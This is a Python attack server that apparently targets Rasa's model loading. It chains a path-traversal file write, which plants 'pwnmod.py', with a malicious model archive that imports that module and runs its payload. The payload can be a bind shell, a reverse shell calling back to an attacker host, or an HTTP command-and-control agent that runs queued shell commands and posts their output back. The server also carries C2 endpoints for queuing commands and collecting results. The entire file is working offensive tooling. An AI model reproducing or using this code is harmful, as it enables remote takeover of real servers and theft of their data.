import argparse import base64 import datetime import http.server import socketserver import urllib.parse from pathlib import Path from typing import Dict, List, Optional BASE_DIR = Path(__file__).resolve().parent DEFAULT_EVIL_MODEL = BASE_DIR / "evil_import_model.tar.gz" def build_pwnmod( mode: str, bind_port: int, reverse_host: Optional[str], reverse_port: Optional[int], c2_base_url: Optional[str], ) -> bytes: """Build pwnmod.py payload for the Rasa graph import chain. Returns bytes ready to be served as the write-module response body. """ # Per-mode imports and bootstrap if mode == "bind": imports = """import os import pty import socket import threading import time""" bootstrap = f""" def _launch(): # Target listens on {bind_port}. Useful when the port is reachable. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0", {bind_port})) s.listen(1) while True: conn, _ = s.accept() pid = os.fork() if pid == 0: try: s.close() os.dup2(conn.fileno(), 0) os.dup2(conn.fileno(), 1) os.dup2(conn.fileno(), 2) pty.spawn("/bin/sh") finally: os._exit(0) conn.close() """ elif mode == "reverse": if not reverse_host or not reverse_port: raise SystemExit("reverse mode requires --reverse-host and --reverse-port") imports = """import os import pty import socket import threading import time""" bootstrap = f""" def _launch(): # Target connects back. Best for Docker/NAT environments. while True: s = None try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("{reverse_host}", {reverse_port})) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) pty.spawn("/bin/sh") except Exception: pass finally: try: if s: s.close() except Exception: pass time.sleep(5) """ elif mode == "c2": if not c2_base_url: raise SystemExit("c2 mode requires --c2-base-url") imports = """import base64 import os import pty import socket import subprocess import threading import time import urllib.parse import urllib.request""" bootstrap = f""" def _launch(): # HTTP polling C2. Reuses the same outbound HTTP path as model fetch. agent = socket.gethostname() while True: try: poll_url = "{c2_base_url}/poll?agent=" + urllib.parse.quote(agent) cmd = urllib.request.urlopen(poll_url, timeout=20).read().decode("utf-8", "ignore").strip() if cmd: proc = subprocess.Popen( ["/bin/sh", "-c", cmd], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, ) out, _ = proc.communicate(timeout=60) data = urllib.parse.urlencode({{ "agent": agent, "cmd": cmd, "output_b64": base64.b64encode(out).decode(), }}).encode() urllib.request.urlopen( urllib.request.Request( "{c2_base_url}/result", data=data, headers={{"Content-Type": "application/x-www-form-urlencoded"}}, method="POST", ), timeout=20, ).read() except Exception: pass time.sleep(3) """ else: raise SystemExit(f"unknown mode: {mode}") payload = f"""{imports} {bootstrap} # Import side-effect: Rasa imports pwnmod before it uses Pwn. threading.Thread(target=_launch, daemon=True).start() class Pwn: @classmethod def load(cls, config=None, model_storage=None, resource=None, execution_context=None, **kwargs): return cls() @staticmethod def get_default_config(): return {{}} def provide(self, **kwargs): return None """ return payload.encode("utf-8") class Handler(http.server.BaseHTTPRequestHandler): server_version = "RasaStage2/1.0" def do_GET(self) -> None: parsed = urllib.parse.urlparse(self.path) query = urllib.parse.parse_qs(parsed.query) if parsed.path.startswith("/write-module"): # Stage 1: path traversal via filename header writes /app/pwnmod.py self.server.hits.append(self._hit("write-module")) self._send_file( self.server.pwnmod, "text/plain; charset=utf-8", self.server.module_filename, "stage2-write-module", ) return if parsed.path.startswith("/model"): # Stage 2: serve the evil model whose metadata.json imports pwnmod.Pwn self.server.hits.append(self._hit("model")) self._send_file( self.server.evil_model.read_bytes(), "application/x-tar", self.server.tar_filename, "stage2-evil-model", ) return # ---- C2 management endpoints ---- if parsed.path.startswith("/poll"): agent = query.get("agent", [None])[0] if agent is None: # Anonymous poll — never consume from wildcard queue. # Only real agents (that know their hostname) get commands. self.server.hits.append(self._hit("poll anonymous (no agent param)")) self._send_file(b"", "text/plain; charset=utf-8", "cmd.txt", "poll") return cmd = self.server.pending_cmds.pop(agent, self.server.pending_cmds.pop("*", "")) self.server.hits.append(self._hit(f"poll agent={agent} cmd={cmd!r}")) self._send_file(cmd.encode("utf-8"), "text/plain; charset=utf-8", "cmd.txt", "poll") return if parsed.path.startswith("/enqueue"): agent = query.get("agent", ["*"])[0] cmd = query.get("cmd", [""])[0] self.server.pending_cmds[agent] = cmd self.server.hits.append(self._hit(f"enqueue agent={agent} cmd={cmd!r}")) self._send_file(b"ok\n", "text/plain; charset=utf-8", "enqueue.txt", "enqueue") return if parsed.path.startswith("/last"): agent = query.get("agent", ["default"])[0] body = self.server.results.get(agent, "") self.server.hits.append(self._hit(f"last agent={agent}")) self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "result.txt", "last") return if parsed.path.startswith("/agents"): body = "\n".join(sorted(self.server.results.keys())) + "\n" self.server.hits.append(self._hit("agents")) self._send_file(body.encode("utf-8"), "text/plain; charset=utf-8", "agents.txt", "agents") return if parsed.path.startswith("/hits"): body = "\n".join(self.server.hits).encode("utf-8") + b"\n" self._send_file(body, "text/plain; charset=utf-8", "hits.txt", "hits") return if parsed.path.startswith("/healthz"): self._send_file(b"ok\n", "text/plain; charset=utf-8", "healthz.txt", "healthz") return self.send_response(404) self.end_headers() self.wfile.write(b"not found\n") def do_POST(self) -> None: parsed = urllib.parse.urlparse(self.path) if not parsed.path.startswith("/result"): self.send_response(404) self.end_headers() self.wfile.write(b"not found\n") return # C2 agent posts command output here. length = int(self.headers.get("Content-Length", "0")) body = self.rfile.read(length) form = urllib.parse.parse_qs(body.decode("utf-8", "ignore")) agent = form.get("agent", ["default"])[0] cmd = form.get("cmd", [""])[0] output_b64 = form.get("output_b64", [""])[0] try: output = base64.b64decode(output_b64).decode("utf-8", "replace") except Exception: output = "" self.server.results[agent] = f"$ {cmd}\n{output}" self.server.hits.append(self._hit(f"result agent={agent} cmd={cmd!r}")) self._send_file(b"ok\n", "text/plain; charset=utf-8", "result_ack.txt", "result") def _hit(self, route: str) -> str: ts = datetime.datetime.now(datetime.timezone.utc).isoformat(timespec="seconds") + "Z" return f"{ts} {self.client_address[0]} {self.command} {self.path} {route}" def _send_file(self, body: bytes, content_type: str, filename: str, etag: str) -> None: self.send_response(200) self.send_header("Content-Type", content_type) self.send_header("Content-Length", str(len(body))) self.send_header("ETag", etag) self.send_header("filename", filename) self.end_headers() self.wfile.write(body) def log_message(self, fmt: str, *args) -> None: print(f"{self.address_string()} - {fmt % args}", flush=True) class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): allow_reuse_address = True # Instance attributes (set in main) pwnmod: bytes evil_model: Path module_filename: str tar_filename: str hits: List[str] pending_cmds: Dict[str, str] results: Dict[str, str] def main() -> None: parser = argparse.ArgumentParser( description="Minimal Rasa stage2 model server — serves path-traversal write + evil model" ) parser.add_argument("--listen", default="0.0.0.0", help="Bind address (default: 0.0.0.0)") parser.add_argument("--port", type=int, default=8000, help="Listen port (default: 8000)") parser.add_argument( "--mode", "--model", choices=["bind", "reverse", "c2"], default="reverse", help="Payload mode: bind shell, reverse shell, or HTTP C2 polling (default: reverse)", ) parser.add_argument("--bind-port", type=int, default=4444, help="Port for bind shell (bind mode)") parser.add_argument("--reverse-host", help="Callback IP/hostname (reverse mode)") parser.add_argument("--reverse-port", type=int, help="Callback port (reverse mode)") parser.add_argument("--c2-base-url", help="C2 poll base URL (c2 mode)") parser.add_argument("--evil-model", type=Path, default=DEFAULT_EVIL_MODEL, help="Path to evil model tar.gz") parser.add_argument("--module-filename", default="../../app/pwnmod.py", help="Path-traversal filename for the write-module stage " "(default: ../../app/pwnmod.py)") parser.add_argument("--tar-filename", default="evil_import_model.tar.gz", help="Filename header value for the model stage " "(default: evil_import_model.tar.gz)") args = parser.parse_args() if not args.evil_model.exists(): raise SystemExit(f"missing evil model archive: {args.evil_model}") pwnmod = build_pwnmod( args.mode, args.bind_port, args.reverse_host, args.reverse_port, args.c2_base_url, ) with ThreadingTCPServer((args.listen, args.port), Handler) as httpd: httpd.pwnmod = pwnmod httpd.evil_model = args.evil_model httpd.module_filename = args.module_filename httpd.tar_filename = args.tar_filename httpd.hits = [] httpd.pending_cmds = {} httpd.results = {} base = f"http://{args.listen}:{args.port}" print(f"listening: {base}", flush=True) print(f"mode: {args.mode}", flush=True) print(f"stage-1: {base}/write-module -> filename: {args.module_filename}", flush=True) print(f"stage-2: {base}/model -> filename: {args.tar_filename}", flush=True) if args.mode == "bind": print(f"bind shell: 0.0.0.0:{args.bind_port}", flush=True) elif args.mode == "reverse": print(f"reverse: {args.reverse_host}:{args.reverse_port}", flush=True) else: print(f"c2 poll: {args.c2_base_url}/poll", flush=True) print(f"enqueue: {base}/enqueue?cmd=id", flush=True) try: httpd.serve_forever() except KeyboardInterrupt: print("\nshutting down", flush=True) if __name__ == "__main__": main()